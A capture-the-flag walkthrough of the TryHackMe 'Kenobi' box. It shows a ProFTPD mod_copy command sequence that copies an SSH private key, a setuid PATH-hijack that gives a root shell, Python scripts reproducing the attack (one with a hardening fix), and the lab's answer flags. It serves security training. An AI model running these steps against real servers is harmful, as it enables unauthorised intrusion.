TryHackMe - Kenobi - Writeup

Walkthrough of exploiting a Linux machine: enumerate Samba shares and an NFS export, abuse the mod_copy module of a vulnerable ProFTPD build to copy an SSH private key somewhere we can read it, and escalate to root through PATH manipulation of a setuid binary.

NMAP Scan

root@ip-10-10-207-9:~# nmap -sC -sV -A 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:23 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00078s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      49912/udp  mountd
|   100005  1,2,3      58881/tcp  mountd
|   100021  1,3,4      36376/udp  nlockmgr
|   100021  1,3,4      39717/tcp  nlockmgr
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:1C:33:5D:1A:83 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-05-06T13:24:10-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-06 19:24:10
|_  start_date: 1600-12-31 23:58:45

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.12 seconds

Enumerating Samba for shares

root@ip-10-10-207-9:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:39 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:1C:33:5D:1A:83 (Unknown)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.207.215\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.207.215\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 2.71 seconds

Using the nmap command above, how many shares have been found?

Answer: 3

root@ip-10-10-207-9:~# smbclient //10.10.207.215/anonymous
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 11:49:09 2019
  ..                                  D        0  Wed Sep  4 11:56:07 2019
  log.txt                             N    12237  Wed Sep  4 11:49:09 2019

		9204224 blocks of size 1024. 6703228 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (2987.5 KiloBytes/sec) (average 2987.5 KiloBytes/sec)
smb: \> 

Once you're connected, list the files on the share. What file can you see?

Answer: log.txt

What port is FTP running on?

Answer: 21

root@ip-10-10-207-9:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.207.215

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-06 19:51 BST
Nmap scan report for ip-10-10-207-215.eu-west-1.compute.internal (10.10.207.215)
Host is up (0.00022s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  2010404.0  6703224.0  24%   16.0T        32000
MAC Address: 02:1C:33:5D:1A:83 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds

What mount can we see?

Answer: /var

Gain initial access with ProFtpd

What is the version?

Answer: 1.3.5

root@ip-10-10-207-9:~# searchsploit proftpd 1.3.5

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
---------------------------------------------- ---------------------------------

How many exploits are there for the ProFTPd running?

Answer: 3

ProFTPD 1.3.5 ships mod_copy, whose SITE CPFR (copy from) and SITE CPTO (copy to) commands can be issued before authenticating (CVE-2015-3306). The copy is performed by the proftpd process, not by us, so it can read kenobi's private key as long as that process can, and because /var is exported over NFS to any client (the "/var *" export above) and /var/tmp is world-writable, copying the key into /var/tmp makes it readable from the attacking host. A plain nc session to port 21 is enough; watch for 350 after CPFR and 250 after CPTO:

root@ip-10-10-207-9:~# nc 10.10.207.215 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.207.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
root@ip-10-10-207-9:~# mkdir /mnt/kenobiNFS
root@ip-10-10-207-9:~# mount 10.10.207.215:/var /mnt/kenobiNFS
root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS

root@ip-10-10-207-9:~# ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt  6 root   root   4096 May  6 20:15 .
drwxr-xr-x 14 root   root   4096 Sep  4  2019 ..
-rw-r--r--  1 ubuntu ubuntu 1675 May  6 20:15 id_rsa
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------  3 root   root   4096 May  6 19:19 systemd-private-25feb6d12a1b4df9a4d0e2993544b880-systemd-timesyncd.service-cxdFHd
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------  3 root   root   4096 Sep  4  2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

root@ip-10-10-207-9:~# cp /mnt/kenobiNFS/tmp/id_rsa ~
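The same CPFR/CPTO exchange as a script, so each reply code is checked instead of read off the screen. This is an added example and not part of the writeup: `read_reply`, `mod_copy` and `start_fake_proftpd` are my names, and the stand-in server at the bottom is a constructed fake that answers only the commands this exchange needs (it is not ProFTPD), so the script can be exercised offline.

```python
"""Drive the mod_copy exchange (SITE CPFR then SITE CPTO) over a raw socket,
checking each reply code. Added example, not the writeup's code; the stand-in
server below is constructed so the exchange can be run offline."""
import io
import socket
import threading


def read_reply(rfile):
    """Read one FTP reply from a binary file object; handles the multi-line
    form ('220-...' continued until a line starting with '220 ')."""
    first = rfile.readline().decode("latin-1")
    if not first:
        raise ConnectionError("server closed the control connection")
    code = first[:3]
    lines = [first.rstrip("\r\n")]
    if first[3:4] == "-":
        while True:
            line = rfile.readline().decode("latin-1")
            if not line:
                raise ConnectionError("truncated multi-line reply")
            lines.append(line.rstrip("\r\n"))
            if line.startswith(code + " "):
                break
    return int(code), "\n".join(lines)


def parse_reply(data):
    """Parse one reply from bytes (wrapper around read_reply)."""
    return read_reply(io.BytesIO(data))


def mod_copy(host, port, src, dst, timeout=5.0):
    """Ask the server to copy src to dst. Returns (copied, banner, last_reply).
    The copy is done by the proftpd process, so src must be readable and dst
    writable by that user; 350 accepts the source, 250 confirms the copy."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("rb")
        code, banner = read_reply(rfile)
        if code != 220:
            return False, banner, banner
        sock.sendall(f"SITE CPFR {src}\r\n".encode())
        code, reply = read_reply(rfile)
        if code != 350:
            return False, banner, reply
        sock.sendall(f"SITE CPTO {dst}\r\n".encode())
        code, reply = read_reply(rfile)
        sock.sendall(b"QUIT\r\n")
        return code == 250, banner, reply


# Constructed stand-in: speaks just enough FTP to answer the exchange above.
FAKE_READABLE = {"/home/kenobi/.ssh/id_rsa"}
BANNER = b"220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [127.0.0.1]\r\n"


def start_fake_proftpd(copied):
    """Serve one connection on 127.0.0.1; append (src, dst) of each successful
    copy to `copied`. Returns (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    host, port = srv.getsockname()

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(BANNER)
            pending = None
            for raw in conn.makefile("rb"):
                cmd = raw.decode("latin-1").strip()
                if cmd.startswith("SITE CPFR "):
                    pending = cmd[len("SITE CPFR "):]
                    if pending in FAKE_READABLE:
                        conn.sendall(b"350 File or directory exists, ready for destination name\r\n")
                    else:
                        conn.sendall(f"550 {pending}: No such file or directory\r\n".encode())
                        pending = None
                elif cmd.startswith("SITE CPTO ") and pending:
                    copied.append((pending, cmd[len("SITE CPTO "):]))
                    pending = None
                    conn.sendall(b"250 Copy successful\r\n")
                elif cmd == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                else:
                    conn.sendall(b"500 Command not understood\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return host, port


if __name__ == "__main__":
    log = []
    h, p = start_fake_proftpd(log)
    print(mod_copy(h, p, "/home/kenobi/.ssh/id_rsa", "/var/tmp/id_rsa"), log)
```

Against the real target you would call mod_copy with the box's address and port 21, then mount the /var export and read /var/tmp/id_rsa exactly as above. Two caveats the nc session hides: a 550 on CPFR means the daemon's user cannot read the source (not that the path is wrong), and a CPTO into a directory that user cannot write fails even though CPFR succeeded, which is why a world-writable, NFS-exported directory such as /var/tmp is the useful destination here.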

root@ip-10-10-207-9:~# ssh -i id_rsa kenobi@10.10.207.215
The authenticity of host '10.10.207.215 (10.10.207.215)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.207.215' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

What is Kenobi’s user flag (/home/kenobi/user.txt)?

Answer: d0b0f3f53b6caa532a83915e19224899

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

What file looks particularly out of the ordinary?

Answer: /usr/bin/menu

Run the binary, how many options appear?

Answer: 3

The binary is setuid root, and its option 1 (status check) invokes curl by bare name rather than by absolute path, so the shell it spawns resolves "curl" through our PATH. Confirm that before planting anything (strings /usr/bin/menu | grep -i curl), then drop a fake curl that execs a shell into a directory we control and put that directory first in PATH:

kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02
# 
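The root cause of that root shell, and the fix, shown side by side. This is an added example and not the writeup's code or the room's menu binary: `status_check_vulnerable` and `status_check_hardened` are my stand-ins for the two behaviours, `SAFE_PATH` is an assumed fixed search path, and the fake curl is constructed to announce itself rather than spawn a shell, so the demo never leaves the temp directory or touches the network.

```python
"""Why option 1 of /usr/bin/menu gave a root shell: a setuid binary that runs
`curl` by bare name lets whoever controls PATH decide which curl executes.
Added example, not the writeup's code nor the room's binary; the functions
are stand-ins and the fake curl is constructed."""
import os
import shutil
import stat
import subprocess
import tempfile

SAFE_PATH = "/usr/bin:/bin"   # assumed fixed, root-owned search path for the hardened form


def plant_fake_curl(directory):
    """Equivalent of `echo /bin/sh > /tmp/curl; chmod 777 /tmp/curl`, except the
    payload only announces itself (constructed stand-in for the shell)."""
    path = os.path.join(directory, "curl")
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho HIJACKED: fake curl ran as $(id -un)\n")
    os.chmod(path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
    return path


def status_check_vulnerable(env):
    """Mirrors the menu binary: system("curl -I localhost") lets /bin/sh walk
    the inherited PATH to find curl, so the caller's environment picks the binary."""
    proc = subprocess.run("curl -I localhost", shell=True, env=env,
                          capture_output=True, text=True)
    return proc.stdout + proc.stderr


def resolve_hardened(command="curl"):
    """The fix: ignore the inherited PATH entirely and resolve the helper only
    from SAFE_PATH (returning None rather than falling back to PATH)."""
    return shutil.which(command, path=SAFE_PATH)


def status_check_hardened():
    """Execute the resolved absolute path with a minimal environment. Returns
    None if the helper is absent instead of searching anywhere else."""
    exe = resolve_hardened()
    if exe is None:
        return None
    proc = subprocess.run([exe, "-I", "localhost"], env={"PATH": SAFE_PATH},
                          capture_output=True, text=True)
    return proc.returncode


def demonstrate():
    """Stage the hijack in a temp dir (standing in for /tmp) and show what each
    variant resolves curl to. Returns (vulnerable_output, hardened_exe, dir)."""
    directory = tempfile.mkdtemp(prefix="kenobi-path-")
    plant_fake_curl(directory)
    hijacked_env = {"PATH": f"{directory}:{SAFE_PATH}"}   # export PATH=/tmp:$PATH
    vulnerable_output = status_check_vulnerable(hijacked_env)
    hardened_exe = resolve_hardened()
    return vulnerable_output, hardened_exe, directory


if __name__ == "__main__":
    out, exe, d = demonstrate()
    print("vulnerable variant ran:", out.strip())
    print("hardened variant resolves curl to:", exe)
```

The hardened form fixes both halves of the bug: it names the helper by absolute path (or resolves it only from a fixed, root-owned path), and it hands the child a minimal environment so neither PATH nor anything else inherited from the caller reaches it. A setuid program that still needs an external helper should additionally drop privileges before calling it; none of that was done here, which is what the `uid=0(root)` in the `id` output above reflects.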

What is the root flag (/root/root.txt)?

Answer: 177b3cd8562289f37382721c28381f02

Thanks for reading.


Written on May 18, 2021